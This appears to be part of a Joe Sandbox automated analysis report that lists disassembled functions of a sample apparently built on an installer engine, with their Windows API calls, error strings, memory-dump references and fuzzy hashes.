Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: fbc14979751385285800862c52df61681122a831c6dc5029e658277833abfaaf
Instruction ID: 3ecafeb8337e297ec35a2d0791a4d16a7ca3676c1000053bc4f2e94a4c9e3043
Opcode Fuzzy Hash: fbc14979751385285800862c52df61681122a831c6dc5029e658277833abfaaf
Instruction Fuzzy Hash: 8B11D237941226F7DF2266DCCD46BADBF25BF14720F20020BF910BA2A1E7325E10A6D1

Function 00599A4D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00599AC4

Strings

Failed to copy condition string from BSTR, xrefs: 00599AAE
ETY, xrefs: 00599A4D
Failed to get Condition inner text., xrefs: 00599A94
Condition, xrefs: 00599A5F
Failed to select condition node., xrefs: 00599A7B
`Dv, xrefs: 00599AC4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FreeString
String ID: Condition$ETY$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`Dv
API String ID: 3341692771-1661913877
Opcode ID: 776fcd947008eba0f174787fec7a28e092697bead640f71932101650dc0960b9
Instruction ID: 7ceb34e51bfab0d256f304d5c0f351414e5e4047904067f59d928bb22f205822
Opcode Fuzzy Hash: 776fcd947008eba0f174787fec7a28e092697bead640f71932101650dc0960b9
Instruction Fuzzy Hash: F8118231951225BBCF219A5CCD0AFADBF78FB00711F14415BFC00A6260D7719E00E690

Function 005ACF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?), ref: 005ACF37
GetLastError.KERNEL32(?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 005ACF41
GetExitCodeThread.KERNEL32(00000001,?,?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?,00000000), ref: 005ACF7D
GetLastError.KERNEL32(?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 005ACF87

Strings

Failed to get cache thread exit code., xrefs: 005ACFB5
Failed to wait for cache thread to terminate., xrefs: 005ACF6F
elevation.cpp, xrefs: 005ACF65, 005ACFAB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 05d614dc7b203669a06480826ebcd2dca5cfd793e7bee366f8453a565b29b5ec
Instruction ID: 0e5110a02caec46b20bb3d910f3436fa2611169e85a66507d9c83809981ac818
Opcode Fuzzy Hash: 05d614dc7b203669a06480826ebcd2dca5cfd793e7bee366f8453a565b29b5ec
Instruction Fuzzy Hash: 42012D77E82639AB9B305B955C0DA5F7F5ABF05BB1B020157FE44BB180E750CD0092E4

Function 005A69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,005A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 005A69BB
GetLastError.KERNEL32(?,005A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 005A69C5
GetExitCodeThread.KERNEL32(00000001,00000000,?,005A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 005A6A04
GetLastError.KERNEL32(?,005A6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 005A6A0E

Strings

core.cpp, xrefs: 005A69EC, 005A6A35
Failed to get cache thread exit code., xrefs: 005A6A3F
Failed to wait for cache thread to terminate., xrefs: 005A69F6

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 2acb682ba2b7c90aa178e54f1da0073f0da83fc95bed0799d08652de5727d2b3
Instruction ID: a07dadb4aafa088afac6ee9e7a15a9854b212b04b4c5e08e5b38e90d778f9179
Opcode Fuzzy Hash: 2acb682ba2b7c90aa178e54f1da0073f0da83fc95bed0799d08652de5727d2b3
Instruction Fuzzy Hash: A2118270741206FBEF109FA19D0AB7E3FA8FB10750F10416AB954E91A0EB31CE00AB64

Function 005AAB9E Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 140COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(yTY,000000FF,00AAC56B,E9005DBA,005953BD,00000000,?,E9005DBA,00000000), ref: 005AAC94
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,yTY,000000FF,00AAC56B,E9005DBA,005953BD,00000000,?,E9005DBA,00000000), ref: 005AACD8

Strings

Failed to get signer chain from authenticode certificate., xrefs: 005AAD06
yTY, xrefs: 005AAC88
cache.cpp, xrefs: 005AAC6A, 005AACB8, 005AACFC
Failed to get provider state from authenticode certificate., xrefs: 005AACC2
Failed authenticode verification of payload: %ls, xrefs: 005AAC75
Failed to verify expected payload against actual certificate chain., xrefs: 005AAD1E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast
String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$yTY
API String ID: 1452528299-349605547
Opcode ID: 6183c33e8762048b73d88c8c9d0711f4f1b44852fbcf4f4529122a7bf90eb7ed
Instruction ID: cbea30c8e0d584e88e392e248a6fc665523dee3a511b172db5a75dbe01b5ad69
Opcode Fuzzy Hash: 6183c33e8762048b73d88c8c9d0711f4f1b44852fbcf4f4529122a7bf90eb7ed
Instruction Fuzzy Hash: EF418376D41229ABDB119B95CC49ADEBFB8FF49760F11012AF940BB281E7709D04CBE1

Function 005AF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005AF7EE
LeaveCriticalSection.KERNEL32(?), ref: 005AF8FB

Strings

UX denied while trying to set source on embedded payload: %ls, xrefs: 005AF870
UX requested unknown payload with id: %ls, xrefs: 005AF85A
user is active, cannot change user state., xrefs: 005AF808
Failed to set source path for container., xrefs: 005AF8E0
UX requested unknown container with id: %ls, xrefs: 005AF8BA
Failed to set source path for payload., xrefs: 005AF88A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 21449e460eea4e89d685d4ef254ae49e35b6adcff2430e144d38e85de289c163
Instruction ID: a9b2b26001e0db9168b1b2a062a00e5388e6c70be78070c7aeadc4859c2708c4
Opcode Fuzzy Hash: 21449e460eea4e89d685d4ef254ae49e35b6adcff2430e144d38e85de289c163
Instruction Fuzzy Hash: 2F310636A00253BB8B219BA8CC49E5E7FACBF55720B158027F804EB241DB79ED009791

Function 005971FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 00597210

Strings

[]{}, xrefs: 0059723A
Failed to format escape sequence., xrefs: 005972AA
Failed to append escape sequence., xrefs: 005972A3
Failed to append characters., xrefs: 0059729C
[\%c], xrefs: 0059726F
Failed to copy string., xrefs: 005972C4
Failed to allocate buffer for escaped string., xrefs: 00597227

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: 6a054f3ecc4bef40ad1885b0a094c3290589818935126090d223f3a6e2159267
Instruction ID: 3b19b080ee3eee64c720eacb74f92e688d8ae98659dd0cda0f9fc8e83d39f0e5
Opcode Fuzzy Hash: 6a054f3ecc4bef40ad1885b0a094c3290589818935126090d223f3a6e2159267
Instruction Fuzzy Hash: A321D73A92962FBADF319794CC46B9E7F69FF58B20F200157F900B6280DB719E00D294

Function 005B5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,005DB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,005B67DE,?,00000001,?,005DB4A0), ref: 005B5C45

Strings

Failed to plan action for target product., xrefs: 005B5CF0
Failed to copy target product code., xrefs: 005B5D78
feclient.dll, xrefs: 005B5C3B, 005B5D65
Failed to insert execute action., xrefs: 005B5C9A
Failed grow array of ordered patches., xrefs: 005B5CDE

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: de773b582180c5b6aaa8dc535e16dd6cc65dda8104929b2c5147a0b7b8bb6bcd
Instruction ID: b7395e087c549f8fcbfb9e5af29f9358f87afa86f0bc78ed6d3668bf522a8ada
Opcode Fuzzy Hash: de773b582180c5b6aaa8dc535e16dd6cc65dda8104929b2c5147a0b7b8bb6bcd
Instruction Fuzzy Hash: A18116B5600B4ADFCB18CF58C884AAA7BA5BF08324F158669FD159B352E730ED51CF50

Function 005CCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,005CD262,00000000,00000000,00000000,00000000,00000000,005C2F1D), ref: 005CCB2F
__fassign.LIBCMT ref: 005CCBAA
__fassign.LIBCMT ref: 005CCBC5
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 005CCBEB
WriteFile.KERNEL32(?,00000000,00000000,005CD262,00000000,?,?,?,?,?,?,?,?,?,005CD262,00000000), ref: 005CCC0A
WriteFile.KERNEL32(?,00000000,00000001,005CD262,00000000,?,?,?,?,?,?,?,?,?,005CD262,00000000), ref: 005CCC43

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 314e3a0bd897a6e54779d08cbf22f4067d41c0f2aaf10f0d9aab45959194349e
Instruction ID: 158347348fc23f00ddbf04c6158faeb62476a055588075d564ba478448a5366e
Opcode Fuzzy Hash: 314e3a0bd897a6e54779d08cbf22f4067d41c0f2aaf10f0d9aab45959194349e
Instruction Fuzzy Hash: 15518C71A002099FDB10CFE8D885FEEBFB9FB19300F14415AE969E7291E7309945CBA1

Function 005B9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,005A7113,000000B8,0000001C,00000100), ref: 005B92A4
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,005DB4B8,000000FF,?,?,?,005A7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 005B932E

Strings

detect.cpp, xrefs: 005B938E
Failed to initialize update bundle., xrefs: 005B93D1
comres.dll, xrefs: 005B93B0
BA aborted detect forward compatible bundle., xrefs: 005B9398

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: c49b7550ea275466b7017c11f61dc83505b8838df3f74b08531dda39e501d5a5
Instruction ID: 984ac4b88f0fc2cb45919c9601f2e43f2bf4edd843a108d46ee4cd989ebd8fa3
Opcode Fuzzy Hash: c49b7550ea275466b7017c11f61dc83505b8838df3f74b08531dda39e501d5a5
Instruction Fuzzy Hash: CE51A171600212FBDF159F64CC85EEABFA6FF45310F204659FA249A2A1C771EC61DBA0

Function 005AD437 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,005DB500,?,00000001,000000FF,?,?,7694B390,00000000,00000001,00000000,?,005A74E6), ref: 005AD560

Strings

Failed to connect to elevated child process., xrefs: 005AD549
Failed to create pipe and cache pipe., xrefs: 005AD4BD
Failed to create pipe name and client token., xrefs: 005AD4A1
Failed to elevate., xrefs: 005AD542
UX aborted elevation requirement., xrefs: 005AD475
elevation.cpp, xrefs: 005AD46B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 026173d8a617fe11036876968cbded5129e6182632404711c2acca3493905115
Instruction ID: 6a7d099e8ce3753ca2690078006e76b025f7d0b237c8f649a42bd7c86a4f23bd
Opcode Fuzzy Hash: 026173d8a617fe11036876968cbded5129e6182632404711c2acca3493905115
Instruction Fuzzy Hash: FA318F72A447267BEB15B264CC0BF7E7F7DBF46324F104105F905A6181EB61AD0042F5

Function 005D0523 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(005FB5FC,00000000,?,?,?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?), ref: 005D0533
CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,005FB5F4,?,005A4207,00000000,Setup), ref: 005D05D7
GetLastError.KERNEL32(?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?,?,?), ref: 005D05E7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?), ref: 005D0621

Part of subcall function 00592DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00592F09

LeaveCriticalSection.KERNEL32(005FB5FC,?,?,005FB5F4,?,005A4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,005954FA,?), ref: 005D067A

Strings

logutil.cpp, xrefs: 005D0606

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: 8125d8ae0f9be0745a897c0762b338f8253999d0c3b8c424f573fc00d868b6da
Instruction ID: 268ecde3fb970b0245fefc7cafe0d8ebed73f2fd653faa7bcbd4ea435478e2a5
Opcode Fuzzy Hash: 8125d8ae0f9be0745a897c0762b338f8253999d0c3b8c424f573fc00d868b6da
Instruction Fuzzy Hash: BE31737190121AEBEF315F69DD49F7A7E69FB40754F410127BA00A62A0E779CD20EB90

Function 005B398D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 005B39F4

Strings

%s%="%s", xrefs: 005B3A27
Failed to escape string., xrefs: 005B3A76
Failed to append property string part., xrefs: 005B3A68
Failed to format property value., xrefs: 005B3A7D
Failed to format property string part., xrefs: 005B3A6F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 794e7906ab0342a083ae0ade36ae7aaf152916b3a6d287a1c80c9c4a63d42002
Instruction ID: 1fdb5a0d27ca6c2333d4179d2b55c82f5ba4ce0ea153b0daa346d6ea885f6010
Opcode Fuzzy Hash: 794e7906ab0342a083ae0ade36ae7aaf152916b3a6d287a1c80c9c4a63d42002
Instruction Fuzzy Hash: 9931883290522ABBCF159F98CC42AEEBF68BB00700F20466AF851B6251D771BF10DB90

Function 005D41E5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,005D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005AA063,00000001), ref: 005D4203
GetLastError.KERNEL32(00000002,?,005D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005AA063,00000001,000007D0,00000001,00000001,00000003), ref: 005D4212
MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,005D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005AA063,00000001), ref: 005D42A6
GetLastError.KERNEL32(?,005D432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,005AA063,00000001,000007D0,00000001), ref: 005D42B0

Part of subcall function 005D4440: FindFirstFileW.KERNEL32(005B923A,?,00000100,00000000,00000000), ref: 005D447B
Part of subcall function 005D4440: FindClose.KERNEL32(00000000), ref: 005D4487

Strings

fileutil.cpp, xrefs: 005D42CF
\, xrefs: 005D4265

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: File$ErrorFindLastMove$CloseFirst
String ID: \$fileutil.cpp
API String ID: 3479031965-1689471480
Opcode ID: 6aad8463873d1a650bb61b0f652fe604261c2f6b57be2a4e0b1839e029c913ad
Instruction ID: d0f18e7339dd91a25cfb1578d1038cdb342c36beb3c8b839aa3fa5b8d2accf1d
Opcode Fuzzy Hash: 6aad8463873d1a650bb61b0f652fe604261c2f6b57be2a4e0b1839e029c913ad
Instruction Fuzzy Hash: 4A319F3AA01226ABDF315E9E8C04A6A7E69BFA1760F11412BFC449B310D3708D41DFD0

Function 0059732C Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,00595932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0059733E
LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,00595932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 0059741D

Strings

Failed to get variable: %ls, xrefs: 0059737F
Failed to get value as string for variable: %ls, xrefs: 0059740C
*****, xrefs: 005973D9, 005973E6
Failed to get unformatted string., xrefs: 005973AE
Failed to format value '%ls' of variable: %ls, xrefs: 005973E7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 300ef0b227b0dd7d02ada6e76d494bccd27cda69140f1ccb21513764e079ffe3
Instruction ID: 201b7972604955679d92c07425d9b2004ee3e0796356537599efba80f268071a
Opcode Fuzzy Hash: 300ef0b227b0dd7d02ada6e76d494bccd27cda69140f1ccb21513764e079ffe3
Instruction Fuzzy Hash: 4231AF3291451EFBDF226E54CC0ABAE7F68FF28321F004627F80466251D771AA60EBD4

Function 005A8DEC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 005A8E37
GetLastError.KERNEL32 ref: 005A8E41
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 005A8EA1

Strings

Failed to allocate administrator SID., xrefs: 005A8E1D
cache.cpp, xrefs: 005A8E65
Failed to initialize ACL., xrefs: 005A8E6F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: bbc951da19949b14b4644e103ae23fa947d3715d5455a3de9278cf796b8b5faa
